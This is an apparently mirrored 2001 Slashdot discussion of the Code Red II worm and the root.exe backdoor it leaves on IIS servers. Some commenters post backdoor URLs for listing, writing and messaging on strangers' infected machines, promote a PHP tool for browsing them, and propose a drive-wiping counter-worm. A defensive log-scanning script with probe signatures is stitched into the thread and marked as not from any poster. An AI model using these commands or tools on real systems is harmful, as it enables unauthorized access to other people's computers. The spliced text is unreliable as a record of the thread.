Slashdot Mirror


Code Red II: Shells for the Taking

sigurdur writes "It seems there is a new and more malicious version of Code Red out there. This one seems to try and copy cmd.exe into a position where it is accessible to us all - the scripts directory. So far I have seen it reported on the intrusions-list at incidents.org where they also just put up a notice about this third generation Code Red worm." I still think sircam is more annoying since it affects every email user, and not primarily poorly administered websites. But imagine how much bandwidth Code Red and Sircam have wasted in the last few weeks?

409 of 602 comments

  1. Re:Apache users Create default.ida 5mb!!!! by beable · · Score: 2, Interesting

    How about if somebody writes a default.ida script which sends the attacking server a GET /default.ida which makes the server go to microsoft.com, download and install the patch, and reboot itself? That'd be neat.

    --
    ...
  2. Some Individual Forensics by VB · · Score: 1


    Are here.

    Frustrated by the lack of any current stats on this from DShield, or Incidents short of the update on the 4th, I collected some stats that might give some indication of where this thing is going. Peak times at 1300 and 1400 MST. Not sure what this means, but seems consistent.

    --
    www.dedserius.com
    VB != VisualBasic
  3. Re:Help track this: submit your logs to dshield! by mjh · · Score: 1

    Wow, that's excellent. Can you put up a pointer to your netcat config? I have one machine that is a webserver and it's pretty easy to track CR with it. But I'd like to be able to track on some of my other machines, and I see no reason for adding apache just to track this thing.

    TIA.

    --
    Key to financial independence: Spend less than you earn. Save and invest the difference. Do it for a long time.
  4. Oh god this is too much fun! by ZanshinWedge · · Score: 2

    I've created a script that parses my server logs for code red hits, then prints up a webpage with each ip linked to "http://[ipaddy]/scripts/root.exe?/c+dir+c:\". It's amazing how many people's computers are just wide open. It's really easy to create, rename, delete, or display just about any file on the poor sap's computer. For example, "http://[ipaddy]/scripts/root.exe?/c+echo+IIS+SUCKS!+>+c:\CODEREDATETHELASTOFYOURCORNFLAKES.txt".

    I mean, errr, hypothetically it would be possible to do such things, uhhh yeah.

    1. Re:Oh god this is too much fun! by traphicone · · Score: 1
      How about something even more in your face:

      http://[ipaddy]/scripts/root.exe?/c+net+send+*+You+are+infected+with+the+Code+Red+II+worm.++Go+and+patch+IIS+already!
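A defender's counterpart to the log-parsing script described in this comment, added here as an example and not code from any poster: instead of linking back to the infected hosts, it tags each request that matches the Code Red probe signatures the thread discusses (the default.ida overflow request and probes for the root.exe copy of cmd.exe) and tallies them per source, which is the shape of report you would hand to an abuse desk or submit to dshield. The log lines are constructed samples in Apache combined-log format using documentation addresses.

```python
import re

# Constructed sample Apache combined-log lines (not from the thread; hosts are
# documentation addresses). Lines 1-2 mimic the Code Red .ida probe, line 3 a
# probe for the root.exe backdoor, line 4 is ordinary traffic.
SAMPLE_LOG = """\
192.0.2.10 - - [05/Aug/2001:13:02:11 -0600] "GET /default.ida?XXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3 HTTP/1.0" 404 280 "-" "-"
192.0.2.10 - - [05/Aug/2001:13:02:13 -0600] "GET /default.ida?XXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3 HTTP/1.0" 404 280 "-" "-"
198.51.100.7 - - [05/Aug/2001:13:04:40 -0600] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 289 "-" "-"
203.0.113.5 - - [05/Aug/2001:13:05:02 -0600] "GET /index.html HTTP/1.1" 200 1043 "-" "Mozilla/4.0"
"""

# Minimal common-log-format parser: source IP, timestamp, request method/path, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)

# Request-path patterns from the discussion: the .ida overflow probe and the
# /scripts/root.exe (cmd.exe copy) left behind by Code Red II. Labels are ours.
SIGNATURES = (
    ("codered-ida-probe", re.compile(r"^/default\.ida\?", re.IGNORECASE)),
    ("codered2-backdoor-probe", re.compile(r"^/scripts/root\.exe", re.IGNORECASE)),
    ("cmd-exe-probe", re.compile(r"/cmd\.exe", re.IGNORECASE)),
)


def classify(path):
    """Return the signature name matching a request path, or None for benign traffic."""
    for name, pattern in SIGNATURES:
        if pattern.search(path):
            return name
    return None


def scan_log(text):
    """Parse log lines; return {ip: {"count", "first", "last", "kinds"}} for probing sources only."""
    hits = {}
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a parseable access-log line
        kind = classify(m.group("path"))
        if kind is None:
            continue  # ordinary request, ignore
        rec = hits.setdefault(
            m.group("ip"),
            {"count": 0, "first": m.group("ts"), "last": m.group("ts"), "kinds": set()},
        )
        rec["count"] += 1
        rec["last"] = m.group("ts")
        rec["kinds"].add(kind)
    return hits


def report(hits):
    """One tab-separated line per source, busiest first: ip, hits, first seen, last seen, signatures."""
    lines = []
    for ip, rec in sorted(hits.items(), key=lambda kv: -kv[1]["count"]):
        kinds = ",".join(sorted(rec["kinds"]))
        lines.append(f"{ip}\t{rec['count']}\t{rec['first']}\t{rec['last']}\t{kinds}")
    return lines


if __name__ == "__main__":
    for line in report(scan_log(SAMPLE_LOG)):
        print(line)
```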

  5. Re:Origin of Code Red? by BalDown · · Score: 2, Funny

    Actually, yes it is based on Code Red Mountain Dew, and Pepsi evidently didn't regard it as negative advertising, as last week they shipped over tons of cases of Code Red MD to the EEye team that named it.

    --
    You wasted packets to get this lousy sig.
  6. Re:this sucks by raju1kabir · · Score: 2
    with raw sockets, you can go into things that can't be done legally according to protocol, so now you can stuff round, triangular, and star shaped pegs through the square hole. things will break. it's like trying to run a car on water, or trying to withdraw cash from an atm with the ace of spades.

    You need to put down the Gibson crack pipe and start speaking in real-world terms. Square pegs? Ace of spades? Random hallucinatory metaphors do not a persuasive argument make.

    Do you have an example of how malformed packets could be used to "take over" something? They're occasionally effective tools for DOS (though less and less as IP protocol handler authors stop making silly assumptions), and I do recall one FreeBSD ipfw vulnerability that hinged on the ability to set a certain flag in the packet header, but basically this is not such a big issue. All the fun and power is at higher levels - in the application layer.

    --
    "Patriotism is your conviction that this country is superior to all other countries because you were born in it." -- GBS
  7. Re:The Breaking Point by nugatory · · Score: 3, Insightful
    So, which will it be, folks?

    None of the above.
    The two historical precedents that come to mind are:

    • The Grand Canyon midair collision on 30 June 1956
    • The sinking of the Titanic
    In both cases, technologies failed in ways that (in hindsight) were predictable and even inevitable consequences of growth beyond their roots. In both cases, the response was moderate, incremental, and designed to preserve existing investments in these technologies. The lesson is that the "breaking point" for a widespread infrastructural technology is very hard to reach. And, like it or not, Windows is one of these technologies.

    Instead, what we'll see happen is more attention to security, taken in small steps. More people will subscribe to alert services, and they'll be willing to pay more for them. Bosses will start asking sysadmins what they've done for security today, and be more willing to sign purchase orders for security-related work. ISPs will pay a bit more attention to open ports on their home users, and some will scan their networks for known security vulnerabilities. OEMs configuring systems for naive users will discover that people will pay for a "safe out of the box" configuration, so they'll start to offer one. And so on, and so on....

    The normal state for an economically useful thing is to be stressed, but not stressed to the breaking point. This should be pretty obvious: if it's not stressed, it was uneconomically overbuilt. We are very far from the breaking point for Windows.

  8. Help track this: submit your logs to dshield! by mjh · · Score: 5, Informative
    You might want to consider submitting your apache logs to dshield. This will help keep track of the extent of this problem as well as help to analyze where it may have originated. If the dshield folks can correlate the earliest attacks of the latest variant, they have a chance at finding where this thing originated.

    Submissions can be made by following these instructions.

    --
    Key to financial independence: Spend less than you earn. Save and invest the difference. Do it for a long time.
    1. Re:Help track this: submit your logs to dshield! by Talla · · Score: 1

      The people who made this don't seem completely clueless, so I doubt there is much use. They will probably have listened for attacks from CR1, and only infected those. You may find them, and even the persons responsible for the servers, but considering the backdoor, it's unlikely there'll still be usable log files.

    2. Re:Help track this: submit your logs to dshield! by MS · · Score: 1
      You're an NT-Admin?
      And you have grep on your NT-box right?
      Not really!
      That's why NT-Admins always need 3rd party software, even for such basic tasks as extracting lines from a logfile for submitting them to DSHIELD.

      :-)
      ms
      --

    3. Re:Help track this: submit your logs to dshield! by Telek · · Score: 1

      Yup, forgot the :) at the end. I just thought that the program name was rather ironic...

      --

      If God gave us curiosity
    4. Re:Help track this: submit your logs to dshield! by mutende · · Score: 1
      Too bad they don't take snort logs.

      Please let me quote from DShield's Linux Clients page:

      "If you are using Snort, download dshield_snort.pl. or the snort portscan format client: snort_portscan.pl"
      --
      Unselfish actions pay back better
    5. Re:Help track this: submit your logs to dshield! by Fishstick · · Score: 2

      >vunerabilities.org, a security scanning site, is listed in the top ten

      Also interesting is the statistic associated with this listing, 31526/2

      The first number is the number of "lines implicating this attacker", the second "number of targets attacked".

      Does this mean only two hosts reported an attack, but over 30,000 times?

      For comparison, 202.75.141.158 is now in first place with 97657/56947

      --

      There is much cruelty in the universe, John.
      Yeah, we seem to have the tour map.

    6. Re:Help track this: submit your logs to dshield! by mjh · · Score: 1
      I route all traffic coming in on port 80 to /dev/null just so snort can keep an eye on the attacks as they're coming in.

      I could be wrong, but I don't think you need to do this. Snort will track this independent of what your firewall is setup to do. Snort operates independent of the IP stack. It uses libpcap to sniff all packets that the interface receives. And if you configure snort to use promiscuous mode, then it'll even track attacks that aren't directed towards your machine.

      So I don't know for sure, but I don't think you need to route your port 80 packets anywhere. I think it'll track it just as long as it gets to your interface.

      --
      Key to financial independence: Spend less than you earn. Save and invest the difference. Do it for a long time.
    7. Re:Help track this: submit your logs to dshield! by MS · · Score: 1
      UNIX - a bad idea 20 years ago a fucking nightmare now.

      That may be true for you - I enjoy using Unix/Linux (I use it on several servers), while it is a nightmare for me administering NT-Boxes (Yes, I administer also an NT-Server)

      And yes, I use grep all the day for various tasks, in cronscripts, from command-line... and it is one of the most useful pieces of "UNIX" together with sed, awk and others. Maybe you have grep on your NT-box - I don't, or at least I didn't find it.

      But then, maybe you are kidding me and simply forgot to put a smiley there.

      ms

    8. Re:Help track this: submit your logs to dshield! by mjh · · Score: 1
      Snort will track this independent of what your firewall is setup to do

      Of course this assumes that snort is running on your firewall! If it isn't well then of course this won't work.

      --
      Key to financial independence: Spend less than you earn. Save and invest the difference. Do it for a long time.
    9. Re:Help track this: submit your logs to dshield! by LinuxHam · · Score: 4, Informative

      It uses libpcap to sniff all packets that the interface receives. And if you configure snort to use promiscuous mode, then it'll even track attacks that aren't directed towards your machine.

      I'm on 56k ppp dialup, so I shouldn't see any attacks (let alone packets) not destined for my machine. Now that you know that, you should also know that I was rejecting all connections to port 80 with ipchains. Therefore, since the worm couldn't connect, it wouldn't transmit the HTTP request that snort is watching for.

      By hanging netcat on port 80 with a 3 second connect limit using xinetd, all inbound port 80 probes get connections. They send their payload, snort alerts on it, netcat routes it directly to /dev/null, and then closes the connection. No huge apache logs, or whatever minimal risks are associated with apache.

      I shunt the payloads directly to /dev/null just so snort can actually watch them coming in. I literally asked for a "dummy listener" on the snort list, and they pointed me to netcat at l0pht.

      --
      Intelligent Life on Earth
    10. Re:Help track this: submit your logs to dshield! by LinuxHam · · Score: 1

      Too bad they don't take snort logs. I route all traffic coming in on port 80 to /dev/null just so snort can keep an eye on the attacks as they're coming in.

      --
      Intelligent Life on Earth
    11. Re:Help track this: submit your logs to dshield! by Anonymous Coward · · Score: 1, Interesting

      Does anyone else find it ironic that vunerabilities.org, a security scanning site, is listed in the top ten attackers on dshield.org? At least, it is listed as of 16:45 EDT.

    12. Re:Help track this: submit your logs to dshield! by siokaos · · Score: 1

      Yeah right! I'm sure they want a list of infected boxen so they know who they can root. Writing a program to follow millions of pathways back to one/a group of IPs is tedious, when you can use that same IP list for evil!

      --
      http://siokaos.org/
    13. Re:Help track this: submit your logs to dshield! by Telek · · Score: 1

      Why in god's name would I want to run a program called CODERED.EXE on my server?!

      --

      If God gave us curiosity
    14. Re:Help track this: submit your logs to dshield! by LeBleu · · Score: 1

      Take a look at http://www.dshield.org/howto.html, it says how to submit snort logs.

      --
      --LeBleu

      If you're reading this you're part of the mass hallucination that is Kevin the Blue.

  9. Re:Listen Code Red * authors! by Unknown+Bovine+Group · · Score: 1
    Why don't you add a check to stay away from Apache servers?! The worm would be more difficult to trace without all those access.log evidence....

    <SarcasticBitchslap>Yeah, since Apache is the only web server that logs access. </SarcasticBitchslap>

    --
    m00.
  10. Re:Origin of Code Red? by Fishstick · · Score: 2
    >My first guess was Coca-Cola

    A Pepsi product (mountain dew), actually

    crack the code

    Tastes like cough syrup but has a pretty good kick (hate to think about what that much red food color does to your internal organs though).

    --

    There is much cruelty in the universe, John.
    Yeah, we seem to have the tour map.

  11. Bandwidth by nick_davison · · Score: 4, Insightful
    But imagine how much bandwidth Code Red and Sircam have wasted in the last few weeks?

    I kind of find myself wondering, which wastes more bandwidth: the virus itself or all of the discussion about the virus?

    I'm assuming the virus wastes vastly more. That said, take a look at the way every news site is covering it, the large images they have accompanying the stories and the vast numbers of people reading them because MSN messenger tells them it's important. I don't know if there is any way of measuring the bandwidth wasted by each but it'd be an interesting ratio to see, if there was.

    1. Re:Bandwidth by zexxxx · · Score: 1
      which wastes more bandwidth: the virus itself or all of the discussion about the virus?

      The virus is to blame for it all. The discussion is about the virus. No virus, no discussion.

    2. Re:Bandwidth by driehuis · · Score: 2
      I'm assuming the virus wastes vastly more.

      Speaking from the bowels of corporate hell, I can assure anyone that the bandwidth issues are as to nothing compared to the manpower invested.

      I've applied the C2 security fixes to our IIS server (they're secret, don't ask me about details or I'd have to bury you). But still, the bleeding thing kept attacking our Apache and Netscrape servers, and you don't want to know the pain and suffering of explaining the risks to the end users...

      --

      Bert Driehuis -- All I asked was a friggin' rotatin' chair. Throw me a bone here, people.

    3. Re:Bandwidth by TrixX · · Score: 4, Insightful

      The bandwidth wasted by the virus is actually wasted, and useless.

      But if all the news, the discussion and similar are useful to make sysadmins a little smarter and make them use less vulnerable servers, or at least keep security patches up to date, I think that is not "waste".

  12. Re:Ummm, no actuall by Carnivore · · Score: 1

    Unfortunately, many shellfish become very toxic if they are dead and uncooked. Maryland Blue Crabs are a classic example--they are always cooked live.
    I would also argue that your average sadist wouldn't get a whole lot out of it because crabs and lobsters really aren't that bright. The pleasure of sadism comes out of the mental domination of the other party. Generally, an intelligent creature is required. (this is all from a college psychology class years ago)

  13. Killing small ISPs by Alien54 · · Score: 5, Informative
    I know of at least one small ISP that had very serious problems this week.

    First one of the top dogs in the place sent sircam throughout the company. This was a really bad hair day.

    Then they had a separate second problem where user mail boxes flooded out crashing the mail server, among other strange things. Imagine users with DSL lines sending out multimegabyte files that bounce. Considering that most ISPs configure the drive space for mail based on average usage of users, and do not set aside the actual amount of drive space for user mail, etc. that has been promised for all users.

    BOOM!

    If this keeps happening, this is going to be bad for business in a lot of places.

    --
    "It is a greater offense to steal men's labor, than their clothes"
    1. Re:Killing small ISPs by cybersmith · · Score: 1

      Code Red, Sircam... they are just the tip of the iceberg. Can you imagine what would happen if a virus similar to Code Red were infecting windows 95/98/Me boxes instead of those running NT/2000 with IIS. ISP's and other corporations need to seriously look at installing filters such as the procmail sanitizer. I have installed this on several systems and it catches over 150 viruses a day, and notifies those infected on how to remove the virus from their system. It's only a matter of time until the Next Code Red hits... one that isn't so easily tracked and acts with a lot more malice (i.e. random smurfing/flooding, reg eating, changing numbers in Excel docs, reformatting outgoing e-mail, posting personal information to usenet, etc.)

    2. Re:Killing small ISPs by slamb · · Score: 2

      I know of at least one small ISP that had very serious problems this week. First one of the top dogs in the place sent sircam throughout the company

      I have absolutely no sympathy for them. It's maybe understandable when someone from completely outside a computer-related field propagates a virus like that. But anyone at an ISP should know better. I don't care if they are in a non-technical position there; they still should have a basic understanding of what their company does. And the most basic understanding is all you need to not be infected.

    3. Re:Killing small ISPs by thrig · · Score: 1

      Translation: using Microsoft is bad for business.

    4. Re:Killing small ISPs by Mike+Schiraldi · · Score: 2

      Watch out, "Microsoft Worm" looks awfully similar to the name of a popular word processing application... If you thought you could get in trouble with the feds for writing and releasing a worm, wait till you see what Microsoft's trademark attorneys will do to you.

    5. Re:Killing small ISPs by sirPaul · · Score: 2, Interesting
      --


      -pB
    6. Re:Killing small ISPs by ethereal · · Score: 1

      It's about time people figured out that Microsoft is bad for business :)

      --

      Your right to not believe: Americans United for Separation of Church and

    7. Re:Killing small ISPs by Velox_SwiftFox · · Score: 2
      You run port 80 requests through procmail? Code Red doesn't spread though email, you know.

      In any case, since Microsoft doesn't install it easily, too few Win9x/Me boxes are running Personal Web Server. I don't think it even includes the vulnerable Index Server component.

    8. Re:Killing small ISPs by Chilles · · Score: 2

      I must disagree with you on this point.
      Yes they should know better, and yes, they probably didn't keep their servers entirely up to date with the latest security updates, but nothing would have happened if nobody had written this worm.
      Next thing the police tells me I'm to blame for the latest break-in in my house because my door wasn't patched against the latest model crowbar.
      They just suffered a lot of damage because some jerk somewhere lacks a decent moral and ethical education.

    9. Re:Killing small ISPs by dizco · · Score: 1

      The police won't tell you that, but if you discover that your front door's lock has become ineffective, and you fail to fix it, i'll certainly call you a moron.

      --sean

    10. Re:Killing small ISPs by slamb · · Score: 1, Flamebait

      Yes they should know better [...] but nothing would have happened if nobody had written this worm.

      I agree absolutely; the writers of these worms deliberately caused a lot of people a lot of stress. There's no excuse for that. They're bastards. But that doesn't change the fact that the people at this ISP would have had no problem if they were competent at their jobs. It's their job to know how to deal with computers; they apparently do not. It's hard for me to be sympathetic.

      and yes, they probably didn't keep their servers entirely up to date with the latest security updates

      I was talking about the SirCam worm in particular here, the one that you need to actually run yourself to get infected with. Missing a security patch is more understandable to me, although ideally people would be vigilant as well as running software that doesn't need to be patched so often.

      Next thing the police tells me I'm to blame for the latest break-in in my house because my door wasn't patched against the latest model crowbar.

      Not to blame, but it's much easier for me to have sympathy for someone whose stuff is stolen despite good common sense than for someone who doesn't even lock the door when (s)he goes on vacation.

      They just suffered a lot of damage because some jerk somewhere lacks a decent moral and ethical education.

      and because they weren't at all cautious. There are plenty of people who had absolutely no problem with SirCam because they were smart enough not to open and run double-named attachments sent to them by a near-illiterate masquerading as someone they may vaguely know (the email addresses it gives aren't necessarily at all close acquaintances). I just don't understand how people in the computer industry could fall victim to SirCam.

    11. Re:Killing small ISPs by cybersmith · · Score: 1

      I'm just saying that worms are here to stay, no matter what form or shape they use to spread. (e-mail or via exploits) So we need to protect users from themselves.

  14. Re:huge cable modem hits by lqx · · Score: 1
    Optus@Home which is the sole @home provider in Australia is already doing this. They are blocking all incoming port 80 traffic from outside their subnet. However, I'm still getting numerous attempts in my ipchains log.

    The matter of fact is that at least this has shielded most of the users from external infections, but pointless when you still have users within subnet infecting each other over and over again :)

  15. Re:213.77.4.237 has been attacking me and by Lord+Azrael · · Score: 1

    shall we all now post IP addresses of victims? This is senseless. I do get about 5 entries per 10 seconds in my logfile from thousands of different servers. reverse lookups show many victims on cable or dsl modems (@home) and just 30% of all ip's are real webservers. so at least all dialup victims can't be informed, and my mails to the postmaster or webmaster of the others, where a reverse lookup revealed who is running that, came back. it's unbelievable, i have 70 websites running on my box and still i do get more code red calls than for normal webpages. thank god it's linux.

    --
    Lord "not Gargamel's Cat!" Azrael
  16. Sue Microsoft - its time for class action by Anonymous Coward · · Score: 1, Interesting

    I'm surprised that Microsoft has escaped a huge class-action lawsuit for all the damage their products have piled upon their users and non-microsoft users. It's about time that somebody takes this on. I live in a Unix world but I'm tired of all the problems Gates and co. cause me.

  17. Re:The Whitehouse.gov lesson by fanatic · · Score: 2

    Actually, they moved it to akamai, a large network of servers distributed across the internet. Requests are spread out over several servers, thereby making the site as a whole more resistant to DDOS. (They just happen to be Linux). Microsoft did the same thing with their DNS servers after these were DDOS'd earlier this year. A network like Akamai may be the only real defense against a good DDOS (syn flood, spoofed IPs) that doesn't involve ignoring some legitimate requests as well as the trash.

    --
    "that's not encryption - it's a new perl script that I'm working on..." - from some Matrix parody
  18. Re:Why do people still use Outlook? by arielb · · Score: 1

    what did she think it was? Iced coffee? Of course you'll burn yourself if you spill coffee on your lap. That's why you should be careful! What's next? Suing tea kettle companies if you are such a klutz that you spilled boiling water all over yourself?

    --
    ---
  19. Re:Apache users Create default.ida 5mb!!!! by ichimunki · · Score: 1

    Yuck! How about if it just deinstalls IIS altogether and sends an email to root (or whatever it's called on NT) explaining that they have forfeited their right to host web services since they can't be bothered to secure them with known patches for worms that are making headlines in non-tech journals even? And considering that .ida sounds like something that should be turned OFF by default and certainly should NOT include a default.ida page (which I'm guessing some "thoughtful" developer included to prevent 404 errors in the default install/demo install), they might consider finding server software that comes preconfigured to be a little more sensible than that.

    --
    I do not have a signature
  20. Re:Code Red Infects Slashdot! by thrig · · Score: 1

    I braved the evil frames of the securityfocus website to bring you:

    http://www.securityfocus.com/archive/1/198282

  21. Re:Ummm, no actuall by Unknown+Bovine+Group · · Score: 1
    I don't care what anyone says, cooking an animal alive is just fucking sadistic.

    Or as Homer would say, "MMmmmm, sadisti-licious!"

    --
    m00.
  22. Re:huge cable modem hits by Aexion · · Score: 1

    I'm a dsl customer and I'm also seeing a lot of attempts to spread the code red I and II worms. After noticing that my dsl modem was flickering constantly even after powering down all of my connected computers I became curious and fired up nuke nabber which displayed the signature for the code red worm coming in on port 80. I watched for a while and also noticed that the activity lights on my dsl modem were flickering much more frequently than any requests being reported by nuke nabber. I then installed a packet sniffer so I could take a closer look at what was going on. Here's where I get in over my head...

    I see constant ARP broadcasts with MAC addresses. I don't really know much about this and am not sure how to interpret what's going on. Can anyone suggest some good resources that might help me decipher this traffic? I wondered if it was perhaps my service provider broadcasting the DHCP address (I'm sure my ignorance of this subject matter is now glaring...) but from my research on how DHCP works I don't think this is what's happening. Any suggested references or information would be greatly appreciated.

    Thanks,

    Aexion

  23. Re:Why do people still use Outlook? by Tuonenkielo · · Score: 1

    The McDonald's coffee case judge was not braindead. Get the facts straight, they have been mentioned even here hundreds of times already. The coffee was hot enough to cause severe burns on contact, and McD knew it was so and they still sold the coffee at such temperature. Not that having some judgement like that against MicroSoft wouldn't be nice. Of course, it might not help much in getting MS to clean up their act.

  24. Re:Code Red Infects Slashdot! by berenddeboer · · Score: 1

    > It is on or near this day that Microsoft's software became, without a doubt, a public nuisance to the internet.

    I've not seen anyone mention the underlying causes for buffer overflows. There are two:

    1. The C language, written for programmer gods. Unfortunately, MS hasn't one. If they had used Pascal (Eiffel/Ada/...) and had range checking on, they would have been safe.
    2. The Intel processor that lets code on the stack be executable.

    Without these two, the Internet would have been a lot safer. And it would have saved lots of security code reviews too. Regards, Berend. (-:

    --
    If I had a sig, I would put it here.
  25. Re:huge cable modem hits by jackb_guppy · · Score: 1

    Not completely true.

    @home at home, it is true no public servers.

    But a business connection can...

    I have a High School in Kansas, a pair of cops in Ohio just banging away. Firewall is eating them all. I have many more that it looks like AT$T have taken off the air.

  26. Code Red II (or III) on cable modem segments by possible · · Score: 2, Interesting
    I posted this to Bugtraq last night but it got rejected. :P

    Anyways, if cable modem users are seeing drastically increased ARPing, the targeting of the Code Red III variant should explain it -- hitting non-existent addresses on your subnet will cause the CMTS headend router to ARP out to see who's got that address, you get the picture.

    At the very least, it's a good opportunity for users to see how many modems your provider has packed onto your segment. If they've packed too many on there, you can be sure the CMTS router's going to get seriously bogged down.

    I have an automated program which sends the IP addresses to the ARIS list *and* to my ISP's security department (those IP's which fall under their management) -- I wonder if ISP's are considering just dropping all packets from infected hosts, so when the customer comes to them and complains, they say "Oh, you're infected, reboot, install the patch, and we'll reconnect you." Seems that this would reduce the load on the CMTS and would be faster than trying to track down each customer individually.

    Chad Loder

    Rapid 7, Inc. - Next generation security products and services

    http://www.rapid7.com

    1. Re:Code Red II (or III) on cable modem segments by myz24 · · Score: 1

      I know I have on our cableone network. I'm seeing up to 5.8k bytes per second of arp traffic. And considering how busy Sundays are I'm thinking the traffic will increase. I have pictures of the amount of traffic I'm getting at this place. I'm using iptraf and gkrellm.

    2. Re:Code Red II (or III) on cable modem segments by rjamestaylor · · Score: 2

      Same thing here - sample tcpdump on eth0:

      tcpdump: listening on eth0
      19:14:07.770553 B arp who-has 66.74.1.213 tell 66.74.0.1
      19:14:08.020553 B arp who-has 66.74.1.184 tell 66.74.0.1
      19:14:08.580553 B arp who-has 66.74.1.112 tell 66.74.0.1
      19:14:08.910553 B arp who-has 66.74.1.226 tell 66.74.0.1
      19:14:09.180553 B arp who-has 66.74.1.158 tell 66.74.0.1
      19:14:09.320553 B arp who-has 66.74.1.8 tell 66.74.0.1
      19:14:09.500553 B arp who-has 66.74.1.159 tell 66.74.0.1
      19:14:09.570553 B arp who-has 66.74.1.252 tell 66.74.0.1
      19:14:09.700553 B arp who-has 66.74.1.116 tell 66.74.0.1
      19:14:09.890553 B arp who-has 66.74.1.253 tell 66.74.0.1
      19:14:10.000553 B arp who-has 66.74.1.183 tell 66.74.0.1
      19:14:10.220553 B arp who-has 66.74.1.108 tell 66.74.0.1
      19:14:10.290553 B arp who-has 66.74.1.192 tell 66.74.0.1
      19:14:10.380553 B arp who-has 66.74.1.147 tell 66.74.0.1
      19:14:10.840553 B arp who-has 66.74.1.113 tell 66.74.0.1
      19:14:10.950553 B arp who-has 66.74.1.71 tell 66.74.0.1
      19:14:11.630553 B arp who-has 66.74.1.237 tell 66.74.0.1
      19:14:11.800553 B arp who-has 66.74.0.127 tell 66.74.0.1
      19:14:11.800553 B arp who-has 66.74.1.181 tell 66.74.0.1
      19:14:11.880553 B arp who-has 66.74.1.226 tell 66.74.0.1
      19:14:12.260553 B arp who-has 66.74.1.18 tell 66.74.0.1
      19:14:12.270553 B arp who-has 66.74.1.8 tell 66.74.0.1
      19:14:12.280553 B arp who-has 66.74.1.98 tell 66.74.0.1
      19:14:12.360553 B arp who-has 66.74.1.146 tell 66.74.0.1
      19:14:12.980553 B arp who-has 66.74.1.122 tell 66.74.0.1
      19:14:13.070553 B arp who-has 66.74.1.132 tell 66.74.0.1
      19:14:13.140553 B arp who-has 66.74.1.108 tell 66.74.0.1
      19:14:13.300553 B arp who-has 66.74.1.192 tell 66.74.0.1
      19:14:13.330553 B arp who-has 66.74.1.208 tell 66.74.0.1
      19:14:13.590553 B arp who-has 66.74.1.126 tell 66.74.0.1
      19:14:13.730553 B arp who-has 66.74.1.145 tell 66.74.0.1
      19:14:13.800553 B arp who-has 66.74.1.113 tell 66.74.0.1
      19:14:13.910553 B arp who-has 66.74.1.71 tell 66.74.0.1
      19:14:14.690553 B arp who-has 10.74.0.180 tell 10.74.0.1
      19:14:14.770553 B arp who-has 66.74.1.181 tell 66.74.0.1
      19:14:15.250553 B arp who-has 66.74.1.98 tell 66.74.0.1
      19:14:15.320553 B arp who-has 66.74.1.146 tell 66.74.0.1
      19:14:15.320553 B arp who-has 66.74.1.159 tell 66.74.0.1
      19:14:15.610553 B arp who-has 66.74.1.231 tell 66.74.0.1
      19:14:15.910553 B arp who-has 66.74.1.253 tell 66.74.0.1
      19:14:16.060553 B arp who-has 66.74.1.189 tell 66.74.0.1
      19:14:16.060553 B arp who-has 66.74.1.132 tell 66.74.0.1
      19:14:16.400553 B arp who-has 66.74.1.41 tell 66.74.0.1
      19:14:16.590553 B arp who-has 66.74.1.125 tell 66.74.0.1
      19:14:16.610553 B arp who-has 66.74.1.126 tell 66.74.0.1
      19:14:16.680553 B arp who-has 66.74.1.145 tell 66.74.0.1
      19:14:17.060553 B arp who-has 66.74.1.169 tell 66.74.0.1
      19:14:17.130553 B arp who-has 66.74.1.79 tell 66.74.0.1
      19:14:17.280553 B arp who-has 66.74.1.35 tell 66.74.0.1
      19:14:17.540553 B arp who-has 66.74.1.254 tell 66.74.0.1
      19:14:17.910553 B arp who-has 66.74.1.226 tell 66.74.0.1
      19:14:18.040553 B arp who-has 66.74.1.223 tell 66.74.0.1
      19:14:18.230553 B arp who-has 66.74.1.8 tell 66.74.0.1
      19:14:18.460553 B arp who-has 66.74.1.115 tell 66.74.0.1

      --
      -- @rjamestaylor on Ello
  27. Re:Someone needs to write by Grishnakh · · Score: 2, Funny

    No, someone needs to write a strand that simply shuts down (or better yet wipes out the hard drives of) MS IIS servers. They're a hazard to everyone else on the internet and should be removed.

  28. But I've had CodeRed by mattvd · · Score: 1

    I don't know what you all are talking about...I've been drinking CodeRed for months now. It's red, highly caffeinated, and tastes like Mountain Dew. Only fruitier.

    I just I'm just more 1337 than all you.

    :-)

    1. Re:But I've had CodeRed by arielb · · Score: 1

      well you just drank a virus. buhbye!

      --
      ---
  29. CodeRed2 Explorer for your viewing pleasure by leonbrooks · · Score: 3, Funny
    It's a bit slap-dash, but here's CodeRed2 Explorer for your PHP-enabled web server. No need for Telnet, even: explore Windows-land a click at a time from the comfort of your browser. (-:

    PLEASE MIRROR THIS and post your mirror URLs in reply to this message (subject Mirror of CodeRed2) since that server is a club server, low bandwidth, low budget. But very secure (Debian on Sparc and well maintained :-)

    SlashDot (the pikers )-: wouldn't let me post directly to this page.

    --
    Got time? Spend some of it coding or testing
  30. Re:Securityfocus asks for IPs by NullAndVoid · · Score: 1

    cat access_log | grep default.ida | tr -d '[' | tr -d ']' | awk '{print $1 " " $4 " " $5}'

    Hmm, tr barfs for me because [ and ] are special (maybe a Solaris peculiarity?). So I used:

    grep default.ida access_log | tr -d '\[\]' | awk '{print $1 " " $4 " " $5}'

    Saved a couple of processes too. *Why* do so many people insist on adding spurious "cat" processes to the beginning of pipelines? It's always at the beginning, too, nobody adds them at the end.

    --


    -- Sigs are for losers
  31. Re:They deserve it by LinuxHam · · Score: 1

    same exploit over a couple of weeks

    Weeks.. heck, months. Some are saying that CRII is reusing the "copy cmd.exe to \scripts" trick that first appeared with the Sadmind/IIS worm... BACK IN MAY!!

    Now THAT is insane! :)

    --
    Intelligent Life on Earth
  32. Re:I'm sorely tempted . . . by IdentityCrisis · · Score: 1

    Ah, found it here. Try this instead: rundll32.exe Shell32.dll,ExitWindowsEx,0x1

  33. Re:Sadmind/IIS unicode worm already did that by LinuxHam · · Score: 1

    Code Red and Sadmind/IIS does not use the same vulnerability

    The poster was not referring to the type of attack. He was referring to the back door that only CR-II installs on the victim server. CR-II does indeed install the same back door that Sadmind installed.. that is, copying cmd.exe to %iisroot/scripts as root.exe.

    --
    Intelligent Life on Earth
